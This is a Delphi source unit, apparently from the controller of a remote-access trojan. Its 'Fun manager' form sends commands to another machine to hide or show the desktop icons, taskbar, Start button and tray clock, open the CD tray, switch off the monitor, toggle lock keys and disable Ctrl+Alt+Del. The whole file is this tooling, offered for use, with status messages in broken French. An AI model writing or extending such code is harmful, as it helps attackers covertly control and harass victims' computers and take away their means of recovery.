(***********************************************************************
************************************************************************
****                                                                ****
****                                                                ****
****     File Name: untFun.pas                                      ****
****                                                                ****
****     Author: //hIDRA_5                                          ****
****                                                                ****
****     Description: Unit main of Fun form                         ****
****                                                                ****
****                                                                ****
************************************************************************
************************************************************************)

unit untFun;

interface

uses
  SysUtils, Classes, Controls, Forms, ExtCtrls, Buttons,
  StdCtrls;

type
  TfrmFun = class(TForm)
    LblDesc0: TLabel;
    LblDesc1: TLabel;
    LblDesc2: TLabel;
    LblDesc9: TLabel;
    LblDesc10: TLabel;
    Label9: TLabel;
    SpdShowReBar: TSpeedButton;
    SpdShowClock: TSpeedButton;
    SpdShowIcons: TSpeedButton;
    SpdShowTask: TSpeedButton;
    SpdShowStart: TSpeedButton;
    SpdShowDesk: TSpeedButton;
    SpdHideDesk: TSpeedButton;
    SpdHideStart: TSpeedButton;
    SpdHideTask: TSpeedButton;
    SpdHideIcons: TSpeedButton;
    SpdHideClock: TSpeedButton;
    SpdHideReBar: TSpeedButton;
    BvlLine: TBevel;
    LblDesc7: TLabel;
    LblDesc6: TLabel;
    LblDesc5: TLabel;
    LblDesc4: TLabel;
    LblDesc8: TLabel;
    SpdCDOpen: TSpeedButton;
    SpdCDClose: TSpeedButton;
    SpdCADOff: TSpeedButton;
    SpdCADOn: TSpeedButton;
    SpdScrollOn: TSpeedButton;
    SpdScrollOff: TSpeedButton;
    SpdCapsOff: TSpeedButton;
    SpdCapsOn: TSpeedButton;
    SpdNumOn: TSpeedButton;
    SpdNumOff: TSpeedButton;
    SpdMonOff: TSpeedButton;
    SpdMonOn: TSpeedButton;
    LblDesc3: TLabel;
    procedure SpdShowDeskClick(Sender: TObject);
    procedure SpdShowStartClick(Sender: TObject);
    procedure SpdShowTaskClick(Sender: TObject);
    procedure SpdShowIconsClick(Sender: TObject);
    procedure SpdShowClockClick(Sender: TObject);
    procedure SpdShowReBarClick(Sender: TObject);
    procedure SpdCDOpenClick(Sender: TObject);
    procedure SpdCADOnClick(Sender: TObject);
    procedure SpdScrollOnClick(Sender: TObject);
    procedure SpdCapsOnClick(Sender: TObject);
    procedure SpdNumOnClick(Sender: TObject);
    procedure SpdMonOnClick(Sender: TObject);
    procedure FormCreate(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  frmFun: TfrmFun;

implementation

uses untMain, untCommands;
{$R *.DFM}

procedure TfrmFun.SpdShowDeskClick(Sender: TObject);
begin
   frmMain.strStatus:='Essait de ' + LowerCase(TSpeedButton(Sender).Caption) + ' desktop icons...';
   frmMain.SendCommand(COMMAND_DESKTOP,IntToStr((Sender as TSpeedButton).Tag));
end;

procedure TfrmFun.SpdShowStartClick(Sender: TObject);
begin
   frmMain.strStatus:='Essait de  ' + LowerCase(TSpeedButton(Sender).Caption) + ' start button...';
   frmMain.SendCommand(COMMAND_START_BUTTON,IntToStr((Sender as TSpeedButton).Tag));
end;

procedure TfrmFun.SpdShowTaskClick(Sender: TObject);
begin
   frmMain.strStatus:='Essait de  ' + LowerCase(TSpeedButton(Sender).Caption) + ' taskbar...';
   frmMain.SendCommand(COMMAND_TASKBAR,IntToStr((Sender as TSpeedButton).Tag));
end;

procedure TfrmFun.SpdShowIconsClick(Sender: TObject);
begin
   frmMain.strStatus:='Essait de  ' + LowerCase(TSpeedButton(Sender).Caption) + ' task icons...';
   frmMain.SendCommand(COMMAND_TASKBAR_ICONS,IntToStr((Sender as TSpeedButton).Tag));
end;

procedure TfrmFun.SpdShowClockClick(Sender: TObject);
begin
   frmMain.strStatus:='Essait de  ' + LowerCase(TSpeedButton(Sender).Caption) + ' task clock...';
   frmMain.SendCommand(COMMAND_TASKBAR_CLOCK,IntToStr((Sender as TSpeedButton).Tag));
end;

procedure TfrmFun.SpdShowReBarClick(Sender: TObject);
begin
   frmMain.strStatus:='Essait de  ' + LowerCase(TSpeedButton(Sender).Caption) + ' task rebar...';
   frmMain.SendCommand(COMMAND_REBAR,IntToStr((Sender as TSpeedButton).Tag));
end;

procedure TfrmFun.SpdCDOpenClick(Sender: TObject);
begin
   frmMain.strStatus:='Essait de  ' + LowerCase(TSpeedButton(Sender).Caption) + ' cd-rom...';
   frmMain.SendCommand(COMMAND_CD_ROM,IntToStr((Sender as TSpeedButton).Tag));
end;

procedure TfrmFun.SpdCADOnClick(Sender: TObject);
begin
   frmMain.strStatus:='Essait de tourner a ' + LowerCase(TSpeedButton(Sender).Caption) + ' ctrl+alt+del...';
   frmMain.SendCommand(COMMAND_CAD,IntToStr((Sender as TSpeedButton).Tag));
end;

procedure TfrmFun.SpdScrollOnClick(Sender: TObject);
begin
   frmMain.strStatus:='Essait de tourner a ' + LowerCase(TSpeedButton(Sender).Caption) + ' scrolllock...';
   frmMain.SendCommand(COMMAND_SCROLL_LOCK,IntToStr((Sender as TSpeedButton).Tag));
end;

procedure TfrmFun.SpdCapsOnClick(Sender: TObject);
begin
   frmMain.strStatus:='Essait de tourner a ' + LowerCase(TSpeedButton(Sender).Caption) + ' capslock...';
   frmMain.SendCommand(COMMAND_CAPS_LOCK,IntToStr((Sender as TSpeedButton).Tag));
end;

procedure TfrmFun.SpdNumOnClick(Sender: TObject);
begin
   frmMain.strStatus:='Essait de tourner a ' + LowerCase(TSpeedButton(Sender).Caption) + ' numlock...';
   frmMain.SendCommand(COMMAND_NUM_LOCK,IntToStr((Sender as TSpeedButton).Tag));
end;

procedure TfrmFun.SpdMonOnClick(Sender: TObject);
begin
   frmMain.strStatus:='Essait de tourner a ' + LowerCase(TSpeedButton(Sender).Caption) + ' monitor...';
   frmMain.SendCommand(COMMAND_MONITOR,IntToStr((Sender as TSpeedButton).Tag));
end;

procedure TfrmFun.FormCreate(Sender: TObject);
begin
   Caption:='Fun manager';
end;

end.
